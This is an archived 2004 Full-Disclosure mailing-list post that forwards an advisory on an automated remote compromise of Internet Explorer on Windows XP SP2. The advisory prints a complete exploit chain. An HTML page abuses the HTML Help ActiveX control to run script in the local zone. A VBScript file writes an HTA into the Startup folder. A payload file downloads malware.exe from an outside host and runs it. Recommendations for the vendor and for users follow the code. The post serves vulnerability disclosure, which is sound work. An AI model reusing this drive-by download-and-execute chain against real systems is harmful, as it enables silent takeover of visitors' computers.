lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY10-DAV3480456E51C084FD61EA68D9A70@phx.gbl> From: se_cur_ity at hotmail.com (morning_wood) Subject: YEY AGAIN Automatic remote compromise of InternetExplorer Service Pack 2 XP SP2 must only be for SP2? No effect on SP1 no drop, no funny action noted. cheers, mw ----- Original Message ----- From: "Michael Evanchik" <mevanchik@...ationship1.com> To: <full-disclosure@...ts.netsys.com>; <bugtraq@...urityfocus.com>; <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>; <vuln@...nwatch.org> Sent: Friday, December 24, 2004 8:10 AM Subject: [Full-Disclosure] YEY AGAIN Automatic remote compromise of InternetExplorer Service Pack 2 XP SP2 > Did they really do a good job on service pack 2? Was it worth the > investment that's reported more then the missile defense system? All these > articles on the great achievement by Microsoft and XP SP2 really merit? > They totally forgot HTA files and HTM help files. Who knows that else. > > > > "Microsoft SP2 team, that is unacceptable, YOUR FIRED." Donald Trump > > > > > > > > > > http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm > > > > > > Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise > > Dec, 21 2004 > > > Vulnerable > ---------- > - Microsoft Internet Explorer 6.0 > - Microsoft Windows XP Pro SP2 > - Microsoft Windows XP Home SP2 > > > Not Tested > ------------------------ > - Microsoft Windows 98 > - Microsoft Internet Explorer 5.x > - Microsoft Windows 2003 Server > > > > Severity > --------- > Critical - Remote code execution, no user intervention > > > Intro > ------ > Although hundreds of millions of dollars have been spent on securing SP2, > perfection is impossible. Through the joint effort of Michael Evanchik > (http://www.michaelevanchik.com) and Paul from Greyhats Security > (http://greyhats.cjb.net), a very critical vulnerability has been developed > that can compromise a user's system without the need for user interaction > besides visiting the malicious page. The vulnerability is not actually a > vulnerability in itself, but rather it is uses multiple known holes in SP2 > including Help ActiveX Control Related Topics Zone Security Bypass > Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting > Vulnerability. > > > > Why Microsoft has still not patched two of these known vulnerabilities that > have been out for almost a half of year now, is beyond me. > > > > > Tech Stuff and Explanation > -------------------------- > > 1. Create a webpage with the following code: > > sp2rc.htm > --------------------------------------------------------------------- > <OBJECT id="localpage" type="application/x-oleobject" > classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% > style="position:absolute;top:140;left:72;z-index:100;" > codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> > <PARAM name="Command" value="Related Topics, MENU"> > <PARAM name="Button" value="Text:Just a button"> > <PARAM name="Window" value="$global_blank"> > <PARAM name="Item1" > value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm"> > </OBJECT> > > <OBJECT id="inject" type="application/x-oleobject" > classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% > style="position:absolute;top:140;left:72;z-index:100;" > codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> > <PARAM name="Command" value="Related Topics, MENU"> > <PARAM name="Button" value="Text:Just a button"> > <PARAM name="Window" value="$global_blank"> > <PARAM name="Item1" > value='command;javascript:execScript("document.write(\"<script > language=\\\"vbscript\\\" > src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fr > omCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'> > </OBJECT> > > <script> > localpage.HHClick(); > setTimeout("inject.HHClick()",100); > </script> > --------------------------------------------------------------------- > > Explanation of above code: > The first object (id: localpage) tells hhctrl.ocx to open a help popup > window to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. > This file was chosen because it is treated as the local zone and it doesn't > have any script to mess us up. On some computers an error is shown before > the popup. This is the user's only chance to prevent the vulnerability from > working. If internet explorer were to be closed at this point, the user > would be safe. > > The second object (id: inject) tells the help popup to navigate to a > javascript protocol, which executes. Thus, cross site scripting has just > taken place. A script tag that uses a remote file is written to the page, > and writehta.txt (below) is executed in the unsecured local zone. > > In the script, HHClick is able to be used to automate the vulnerability. > This is more effective than the previously described method of requiring a > user to click on a button. > > > 2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the > user's startup folder. See Michael Evanchik's analysis of the drag and drop > vulnerability for an explanation on adodb recordset. > > Also it is reported that a ADODB recordset can be build locally without > using a http server or ftp server like below. > > writehta.txt > --------------------------------------------------------------------- > Dim Conn, rs > Set Conn = CreateObject("ADODB.Connection") > Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ > "Dbq=http://www.malware.com;" & _ > "Extensions=asc,csv,tab,txt;" & _ > "Persist Security Info=False" > Dim sql > sql = "SELECT * from foobar.txt" > set rs = conn.execute(sql) > set rs =CreateObject("ADODB.recordset") > rs.Open "SELECT * from foobar.txt", conn > rs.Save "C:\Documents and Settings\All Users\Start > Menu\Programs\Startup\Microsoft Office.hta", adPersistXML > rs.close > conn.close > window.close > --------------------------------------------------------------------- > > > 3. f00bar.txt (thanks malware for hosting this file) is the file requested > by the adodb recordset (again, read the drag and drop analysis at > www.michaelevanchik.com for an explanation on how this works and why the the > f00bar.txt looks like it does). Because there is absolutely no limit on what > you can do in an hta file, an old, yet effective method of requesting and > saving a file to the user's hd is used. From that, a wscript shell is > created and used to run the program. And now, ladies and gentlemen, we have > compromised the user's machine. > > f00bar.txt > --------------------------------------------------------------------- > "meaning less shit i had to put here" > "<script language=vbscript> crap = """ > """: on error resume next: crap = """ > """ : set o = CreateObject(""msxml2.XMLHTTP"") : crap=""" > """ : o.open > ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : > crap=""" > """ : o.send : crap=""" > """ : set s = createobject(""adodb.stream"") : crap=""" > """ : s.type=1 : crap=""" > """ : s.open : crap=""" > """ : s.write o.responseBody : crap=""" > """ : s.savetofile ""C:\malware.exe"",2 : crap=""" > """ : Set ws = CreateObject(""WScript.Shell"") : crap=""" > """ : ws.Run ""C:\malware.exe"", 3, FALSE : crap=""" > """</script> crap=""" > --------------------------------------------------------------------- > > > 4. Upload hhtctrl.ocx for the computers that don't happen to have this > control. All XP's seem to have this by default, some win2k3's do not > (according to Michael Evanchik) > > > Proof of Concept? > ------------------ > - http://freehost07.websamba.com/greyhats/sp2rc.htm > > - If an error is shown, press OK. This is normal. > > - Notice in your startup menu a new file called Microsoft Office.hta. When > run, this file will download and launch a harmless executable (which > includes a pretty neat fire animation) > > > > Vendor Recommendations > ---------------------- > - Like Michael Evanchik said in his previous analysis, Microsoft needs to > apply XP Service Pack 2's local zone lockdown to .HTA files and HTML Help > (chm) files as well. > > - This might be a little farfetched, but it would solve a lot of problems: > Take out the startup folder and only support running files during startup > through the registry. The startup folder is a major part of this > vulnerability and I can almost guarantee it will be used for another remote > compromise. > > - Microsoft could possibly take HTA files out altogether. I have not seen > them used for anything beyond hacking. > > - No vulnerability is too small or too insignificant to be taken seriously. > Treat every vulnerability as if it could be dangerous. > > > > User Recommendations > --------------------- > - Disable hta files. > - Get yourself antivirus software. I recommend Symantec because once they > get their lazy asses off the couch and fix some of this stuff you will be a > lot better off. > - Disable active scripting in Internet Explorer. If nothing else, do this. > - Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox > www.mozilla.org) > > > > Credit > ------ > Paul from Greyhats > Michael Evanchik > Http equiv (thanks for allowing me to use your server for f00bar.txt) > > > Greets > ------ > - Liu Die Yu (all the work you've done is amazing) > > > Contact > ------- > paul@...yhats.cjb.net > http://greyhats.cjb.net > > Note > ----- > Greyhats is becoming bigger and is in need of an upgrade. If anyone is > interested in donating some webspace and a domain name I would be very > appreciative. Contact me so that we may work something out :) > > > > > > Michael Evanchik > > Relationship1 > > p: 914-921-4400 > > f: 914-921-6007 > > mailto:mevanchik@...ationship1.com > > web: http://www.relationship1.com
Powered by blists - more mailing lists